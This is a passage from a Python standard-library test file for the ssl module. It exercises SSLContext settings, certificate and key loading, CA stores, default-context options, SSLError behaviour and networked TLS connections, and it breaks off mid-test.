    def test_verify_mode(self):
        """verify_mode round-trips valid CERT_* values and rejects others."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Default value
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        ctx.verify_mode = ssl.CERT_OPTIONAL
        self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        ctx.verify_mode = ssl.CERT_NONE
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        with self.assertRaises(TypeError):
            ctx.verify_mode = None
        with self.assertRaises(ValueError):
            ctx.verify_mode = 42
    @unittest.skipUnless(have_verify_flags(),
                         "verify_flags need OpenSSL > 0.9.8")
    def test_verify_flags(self):
        """verify_flags defaults and assignment of VERIFY_* combinations."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # default value
        tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
        ctx.verify_flags = ssl.VERIFY_DEFAULT
        self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
        # supports any value
        ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
        self.assertEqual(ctx.verify_flags,
                         ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
        with self.assertRaises(TypeError):
            ctx.verify_flags = None
    def test_load_cert_chain(self):
        """load_cert_chain with combined, separate, protected and callback
        supplied key material, plus the corresponding error cases."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Combined key and cert in a single file
        ctx.load_cert_chain(CERTFILE, keyfile=None)
        ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
        self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
        with self.assertRaises(IOError) as cm:
            ctx.load_cert_chain(NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(BADCERT)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(EMPTYCERT)
        # Separate key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY)
        ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
        ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYCERT)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(ONLYKEY)
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
        # Mismatching key and cert
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
            ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
        # Password protected key and cert
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=bytearray(KEY_PASSWORD.encode()))
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
        ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
                            bytearray(KEY_PASSWORD.encode()))
        with self.assertRaisesRegexp(TypeError, "should be a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
        with self.assertRaisesRegexp(ValueError, "cannot be longer"):
            # openssl has a fixed limit on the password buffer.
            # PEM_BUFSIZE is generally set to 1kb.
            # Return a string larger than this.
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
        # Password callback
        def getpass_unicode():
            return KEY_PASSWORD
        def getpass_bytes():
            return KEY_PASSWORD.encode()
        def getpass_bytearray():
            return bytearray(KEY_PASSWORD.encode())
        def getpass_badpass():
            return "badpass"
        def getpass_huge():
            return b'a' * (1024 * 1024)
        def getpass_bad_type():
            return 9
        def getpass_exception():
            raise Exception('getpass error')
        class GetPassCallable:
            def __call__(self):
                return KEY_PASSWORD
            def getpass(self):
                return KEY_PASSWORD
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
        ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
        ctx.load_cert_chain(CERTFILE_PROTECTED,
                            password=GetPassCallable().getpass)
        with self.assertRaises(ssl.SSLError):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
        with self.assertRaisesRegexp(ValueError, "cannot be longer"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
        with self.assertRaisesRegexp(TypeError, "must return a string"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
        with self.assertRaisesRegexp(Exception, "getpass error"):
            ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
        # Make sure the password function isn't called if it isn't needed
        ctx.load_cert_chain(CERTFILE, password=getpass_exception)
    def test_load_verify_locations(self):
        """load_verify_locations with str/bytes cafile and capath arguments."""
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(CERTFILE)
        ctx.load_verify_locations(cafile=CERTFILE, capath=None)
        ctx.load_verify_locations(BYTES_CERTFILE)
        ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
        ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
        self.assertRaises(TypeError, ctx.load_verify_locations)
        self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
        with self.assertRaises(IOError) as cm:
            ctx.load_verify_locations(NONEXISTINGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(IOError):
            ctx.load_verify_locations(u'')
        with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
            ctx.load_verify_locations(BADCERT)
        ctx.load_verify_locations(CERTFILE, CAPATH)
        ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
        # Issue #10989: crash if the second argument type is invalid
        self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
    def test_load_verify_cadata(self):
        """load_verify_locations(cadata=...) with PEM and DER input,
        deduplication, concatenation and error cases."""
        # test cadata
        with open(CAFILE_CACERT) as f:
            cacert_pem = f.read().decode("ascii")
        cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
        with open(CAFILE_NEURONIO) as f:
            neuronio_pem = f.read().decode("ascii")
        neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
        # test PEM
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
        ctx.load_verify_locations(cadata=cacert_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=neuronio_pem)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = "\n".join((cacert_pem, neuronio_pem))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # with junk around the certs
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = ["head", cacert_pem, "other", neuronio_pem, "again",
                    neuronio_pem, "tail"]
        ctx.load_verify_locations(cadata="\n".join(combined))
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # test DER
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_verify_locations(cadata=cacert_der)
        ctx.load_verify_locations(cadata=neuronio_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # cert already in hash table
        ctx.load_verify_locations(cadata=cacert_der)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # combined
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        combined = b"".join((cacert_der, neuronio_der))
        ctx.load_verify_locations(cadata=combined)
        self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
        # error cases
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
        with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
            ctx.load_verify_locations(cadata=u"broken")
        with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
            ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
    """load_dh_params() accepts str and bytes paths, rejects bad
    arguments, and fails cleanly on missing or non-DH files."""
    filename = u'dhpäräm.pem'
    fs_encoding = sys.getfilesystemencoding()
    try:
        filename.encode(fs_encoding)
    except UnicodeEncodeError:
        self.skipTest("filename %r cannot be encoded to the filesystem encoding %r" % (filename, fs_encoding))
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    ctx.load_dh_params(DHFILE)
    # bytes paths are not supported on Windows
    if os.name != 'nt':
        ctx.load_dh_params(BYTES_DHFILE)
    self.assertRaises(TypeError, ctx.load_dh_params)
    self.assertRaises(TypeError, ctx.load_dh_params, None)
    with self.assertRaises(IOError) as cm:
        ctx.load_dh_params(NONEXISTINGCERT)
    self.assertEqual(cm.exception.errno, errno.ENOENT)
    with self.assertRaises(ssl.SSLError) as cm:
        # a certificate file does not contain DH parameters
        ctx.load_dh_params(CERTFILE)
    with support.temp_dir() as d:
        fname = os.path.join(d, filename)
        # getfilesystemencoding() may be None on some platforms;
        # fall back to the default encoding (reuse fs_encoding from above
        # instead of calling sys.getfilesystemencoding() a second time)
        fsencoding = fs_encoding or sys.getdefaultencoding()
        try:
            fname = fname.encode(fsencoding)
        except UnicodeEncodeError:
            # was a bare "except:", which also swallowed unrelated
            # failures such as LookupError for an unknown codec
            raise unittest.SkipTest("only NT+ and systems with "
                                    "Unicode-friendly filesystem encoding")
        shutil.copy(DHFILE, fname)
        ctx.load_dh_params(fname)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
    """A freshly created context reports all-zero session statistics."""
    # build the expected all-zero mapping once, outside the loop
    expected = {key: 0 for key in (
        'number', 'connect', 'connect_good', 'connect_renegotiate',
        'accept', 'accept_good', 'accept_renegotiate',
        'hits', 'misses', 'timeouts', 'cache_full',
    )}
    for proto in PROTOCOLS:
        context = ssl.SSLContext(proto)
        self.assertEqual(context.session_stats(), expected)
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
    """set_ecdh_curve() accepts a known curve as str or bytes, and
    rejects missing, None, and unknown curve names."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    for curve in ("prime256v1", b"prime256v1"):
        context.set_ecdh_curve(curve)
    self.assertRaises(TypeError, context.set_ecdh_curve)
    self.assertRaises(TypeError, context.set_ecdh_curve, None)
    for unknown in ("foo", b"foo"):
        self.assertRaises(ValueError, context.set_ecdh_curve, unknown)
@needs_sni
def test_sni_callback(self):
    """set_servername_callback() accepts only a callable or None."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    self.assertRaises(TypeError, context.set_servername_callback)
    for not_callable in (4, "", context):
        self.assertRaises(TypeError,
                          context.set_servername_callback, not_callable)

    def noop_callback(sock, servername, ctx):
        pass

    # both None (clear) and a real callable are accepted
    context.set_servername_callback(None)
    context.set_servername_callback(noop_callback)
@needs_sni
def test_sni_callback_refcycle(self):
    # Reference cycles through the servername callback are detected
    # and cleared.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    # The default argument (cycle=ctx) makes the callback hold a
    # reference back to the context that holds the callback.
    def dummycallback(sock, servername, ctx, cycle=ctx):
        pass
    ctx.set_servername_callback(dummycallback)
    wr = weakref.ref(ctx)
    del ctx, dummycallback
    gc.collect()
    # the cycle collector must have been able to free the context
    self.assertIs(wr(), None)
def test_cert_store_stats(self):
    """cert_store_stats() counts only certs in the verification store,
    classifying them as CA vs. non-CA."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    empty = {'x509_ca': 0, 'crl': 0, 'x509': 0}
    self.assertEqual(context.cert_store_stats(), empty)
    # the context's own cert chain is not part of the verify store
    context.load_cert_chain(CERTFILE)
    self.assertEqual(context.cert_store_stats(), empty)
    # CERTFILE is not a CA cert, so it counts under 'x509' only
    context.load_verify_locations(CERTFILE)
    self.assertEqual(context.cert_store_stats(),
                     {'x509_ca': 0, 'crl': 0, 'x509': 1})
    # CAFILE_CACERT is a CA cert and bumps both counters
    context.load_verify_locations(CAFILE_CACERT)
    self.assertEqual(context.cert_store_stats(),
                     {'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
    """get_ca_certs() lists only loaded certificates flagged as CAs,
    decoded by default or DER-encoded when passed True."""
    expected_cacert = {
        'issuer': ((('organizationName', 'Root CA'),),
                   (('organizationalUnitName', 'http://www.cacert.org'),),
                   (('commonName', 'CA Cert Signing Authority'),),
                   (('emailAddress', 'support@cacert.org'),)),
        'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
        'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
        'serialNumber': '00',
        'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
        'subject': ((('organizationName', 'Root CA'),),
                    (('organizationalUnitName', 'http://www.cacert.org'),),
                    (('commonName', 'CA Cert Signing Authority'),),
                    (('emailAddress', 'support@cacert.org'),)),
        'version': 3,
    }
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    self.assertEqual(context.get_ca_certs(), [])
    # CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
    context.load_verify_locations(CERTFILE)
    self.assertEqual(context.get_ca_certs(), [])
    # but CAFILE_CACERT is a CA cert
    context.load_verify_locations(CAFILE_CACERT)
    self.assertEqual(context.get_ca_certs(), [expected_cacert])
    # binary form: the DER encoding of the same certificate
    with open(CAFILE_CACERT) as f:
        pem = f.read()
    der = ssl.PEM_cert_to_DER_cert(pem)
    self.assertEqual(context.get_ca_certs(True), [der])
def test_load_default_certs(self):
    """load_default_certs() accepts no argument or a Purpose, may be
    called repeatedly, and rejects anything that is not a Purpose."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.load_default_certs()

    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.load_default_certs(ssl.Purpose.SERVER_AUTH)
    # loading twice on the same context must be harmless
    context.load_default_certs()

    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.load_default_certs(ssl.Purpose.CLIENT_AUTH)

    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    for bad_purpose in (None, 'SERVER_AUTH'):
        self.assertRaises(TypeError, context.load_default_certs, bad_purpose)
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
    """SSL_CERT_DIR / SSL_CERT_FILE env vars steer load_default_certs()."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    with support.EnvironmentVarGuard() as env:
        env["SSL_CERT_DIR"] = CAPATH
        env["SSL_CERT_FILE"] = CERTFILE
        context.load_default_certs()
        # exactly the single cert from SSL_CERT_FILE ends up in the
        # store; capath entries are loaded on request, not eagerly
        self.assertEqual(context.cert_store_stats(),
                         {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
    """On Windows the env vars add to the system store, not replace it."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    context.load_default_certs()
    # baseline: whatever the Windows system store already provides
    baseline = context.cert_store_stats()

    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    with support.EnvironmentVarGuard() as env:
        env["SSL_CERT_DIR"] = CAPATH
        env["SSL_CERT_FILE"] = CERTFILE
        context.load_default_certs()
        # exactly one extra (non-CA) cert from SSL_CERT_FILE
        baseline["x509"] += 1
        self.assertEqual(context.cert_store_stats(), baseline)
def _assert_context_options(self, ctx):
    """Check that *ctx* carries the options every default context sets."""
    self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
    # these constants are 0 when the local OpenSSL build lacks the
    # feature, in which case there is nothing to check
    for option in (OP_NO_COMPRESSION, OP_SINGLE_DH_USE,
                   OP_SINGLE_ECDH_USE, OP_CIPHER_SERVER_PREFERENCE):
        if option != 0:
            self.assertEqual(ctx.options & option, option)
def test_create_default_context(self):
    """create_default_context() verifies certs for server-auth use and
    disables verification for client-auth (server-side) use."""
    context = ssl.create_default_context()
    self.assertEqual(context.protocol, ssl.PROTOCOL_SSLv23)
    self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
    self.assertTrue(context.check_hostname)
    self._assert_context_options(context)

    # all three CA sources (cafile, capath, cadata) may be combined
    with open(SIGNING_CA) as f:
        cadata = f.read().decode("ascii")
    context = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
                                         cadata=cadata)
    self.assertEqual(context.protocol, ssl.PROTOCOL_SSLv23)
    self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
    self._assert_context_options(context)

    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    self.assertEqual(context.protocol, ssl.PROTOCOL_SSLv23)
    self.assertEqual(context.verify_mode, ssl.CERT_NONE)
    self._assert_context_options(context)
def test__create_stdlib_context(self):
    """_create_stdlib_context() defaults to an unverified SSLv23 context
    and honours protocol, cert_reqs, check_hostname and purpose."""
    def check(context, protocol, verify_mode):
        # common assertions shared by every variant below
        self.assertEqual(context.protocol, protocol)
        self.assertEqual(context.verify_mode, verify_mode)
        self._assert_context_options(context)

    context = ssl._create_stdlib_context()
    check(context, ssl.PROTOCOL_SSLv23, ssl.CERT_NONE)
    self.assertFalse(context.check_hostname)

    check(ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1),
          ssl.PROTOCOL_TLSv1, ssl.CERT_NONE)

    context = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
                                         cert_reqs=ssl.CERT_REQUIRED,
                                         check_hostname=True)
    check(context, ssl.PROTOCOL_TLSv1, ssl.CERT_REQUIRED)
    self.assertTrue(context.check_hostname)

    check(ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH),
          ssl.PROTOCOL_SSLv23, ssl.CERT_NONE)
def test__https_verify_certificates(self):
    """_https_verify_certificates() swaps the default HTTPS context
    factory between the verifying and unverified variants."""
    # The factories themselves are tested above.
    # This test will fail by design if run under PYTHONHTTPSVERIFY=0
    # (as will various test_httplib tests).
    # A fresh SSL module avoids mutating the real one.
    local_ssl = support.import_fresh_module("ssl")

    def assert_verified(expected):
        factory = (local_ssl.create_default_context if expected
                   else local_ssl._create_unverified_context)
        self.assertIs(local_ssl._create_default_https_context, factory)

    # certificate verification is enabled by default
    assert_verified(True)
    # turn default verification off, then back on
    local_ssl._https_verify_certificates(enable=False)
    assert_verified(False)
    local_ssl._https_verify_certificates(enable=True)
    assert_verified(True)
    # calling with no argument enables verification
    local_ssl._https_verify_certificates(enable=False)
    local_ssl._https_verify_certificates()
    assert_verified(True)
def test__https_verify_envvar(self):
    # Unit test to check the PYTHONHTTPSVERIFY handling
    # Need to use a subprocess so it can still be run under -E
    # Each snippet is run with "python -c" and exits non-zero (with an
    # explanatory message) when the default HTTPS context factory is
    # not the one it expects.
    https_is_verified = """import ssl, sys; \
        status = "Error: _create_default_https_context does not verify certs" \
            if ssl._create_default_https_context is \
                ssl._create_unverified_context \
            else None; \
        sys.exit(status)"""
    https_is_not_verified = """import ssl, sys; \
        status = "Error: _create_default_https_context verifies certs" \
            if ssl._create_default_https_context is \
                ssl.create_default_context \
            else None; \
        sys.exit(status)"""
    extra_env = {}
    # Omitting it leaves verification on
    assert_python_ok("-c", https_is_verified, **extra_env)
    # Setting it to zero turns verification off
    extra_env[ssl._https_verify_envvar] = "0"
    assert_python_ok("-c", https_is_not_verified, **extra_env)
    # Any other value should also leave it on
    for setting in ("", "1", "enabled", "foo"):
        extra_env[ssl._https_verify_envvar] = setting
        assert_python_ok("-c", https_is_verified, **extra_env)
def test_check_hostname(self):
    """check_hostname can only be enabled alongside certificate
    verification, and verification cannot be dropped while it is on."""
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    self.assertFalse(context.check_hostname)

    # enabling requires CERT_REQUIRED or CERT_OPTIONAL
    with self.assertRaises(ValueError):
        context.check_hostname = True

    context.verify_mode = ssl.CERT_REQUIRED
    # changing verify_mode does not implicitly flip check_hostname
    self.assertFalse(context.check_hostname)
    context.check_hostname = True
    self.assertTrue(context.check_hostname)

    context.verify_mode = ssl.CERT_OPTIONAL
    context.check_hostname = True
    self.assertTrue(context.check_hostname)

    # cannot select CERT_NONE while check_hostname is enabled
    with self.assertRaises(ValueError):
        context.verify_mode = ssl.CERT_NONE
    context.check_hostname = False
    self.assertFalse(context.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
    """Tests that talk to a real remote host (REMOTE_HOST) over the
    network; each is guarded by support.transient_internet() so transient
    network failures skip rather than fail."""

    def test_connect(self):
        # wrap_socket() without verification, then with verification but
        # no CA certs (must fail), then with the right root cert.
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE)
            try:
                s.connect((REMOTE_HOST, 443))
                # without verification no peer cert details are exposed
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()
            # this should fail because we have no verification certs
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED)
            self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
                                    s.connect, (REMOTE_HOST, 443))
            s.close()
            # this should succeed because we specify the root cert
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT)
            try:
                s.connect((REMOTE_HOST, 443))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_connect_ex(self):
        # Issue #11326: check connect_ex() implementation
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT)
            try:
                self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_non_blocking_connect_ex(self):
        # Issue #11326: non-blocking connect_ex() should allow handshake
        # to proceed after the socket gets ready.
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                s.setblocking(False)
                rc = s.connect_ex((REMOTE_HOST, 443))
                # EWOULDBLOCK under Windows, EINPROGRESS elsewhere
                self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
                # Wait for connect to finish
                select.select([], [s], [], 5.0)
                # Non-blocking handshake
                while True:
                    try:
                        s.do_handshake()
                        break
                    except ssl.SSLWantReadError:
                        select.select([s], [], [], 5.0)
                    except ssl.SSLWantWriteError:
                        select.select([], [s], [], 5.0)
                # SSL established
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_timeout_connect_ex(self):
        # Issue #12065: on a timeout, connect_ex() should return the original
        # errno (mimicking the behaviour of non-SSL sockets).
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                # absurdly small timeout to force the timeout path
                s.settimeout(0.0000001)
                rc = s.connect_ex((REMOTE_HOST, 443))
                if rc == 0:
                    self.skipTest("REMOTE_HOST responded too quickly")
                self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
            finally:
                s.close()

    def test_connect_ex_error(self):
        # connecting to a port with no listener must surface the errno
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT)
            try:
                rc = s.connect_ex((REMOTE_HOST, 444))
                # Issue #19919: Windows machines or VMs hosted on Windows
                # machines sometimes return EWOULDBLOCK.
                errors = (
                    errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
                    errno.EWOULDBLOCK,
                )
                self.assertIn(rc, errors)
            finally:
                s.close()

    def test_connect_with_context(self):
        with support.transient_internet(REMOTE_HOST):
            # Same as test_connect, but with a separately created context
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()
            # Same with a server hostname
            s = ctx.wrap_socket(socket.socket(socket.AF_INET),
                                server_hostname=REMOTE_HOST)
            s.connect((REMOTE_HOST, 443))
            s.close()
            # This should fail because we have no verification certs
            ctx.verify_mode = ssl.CERT_REQUIRED
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
                                    s.connect, (REMOTE_HOST, 443))
            s.close()
            # This should succeed because we specify the root cert
            ctx.load_verify_locations(REMOTE_ROOT_CERT)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

    def test_connect_capath(self):
        # Verify server certificates using the `capath` argument
        # NOTE: the subject hashing algorithm has been changed between
        # OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
        # contain both versions of each certificate (same content, different
        # filename) for this test to be portable across OpenSSL releases.
        with support.transient_internet(REMOTE_HOST):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()
            # Same with a bytes `capath` argument
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=BYTES_CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

    def test_connect_cadata(self):
        # Verify server certificates passed in-memory via `cadata`,
        # both as PEM text and as DER bytes.
        with open(REMOTE_ROOT_CERT) as f:
            pem = f.read().decode('ascii')
        der = ssl.PEM_cert_to_DER_cert(pem)
        with support.transient_internet(REMOTE_HOST):
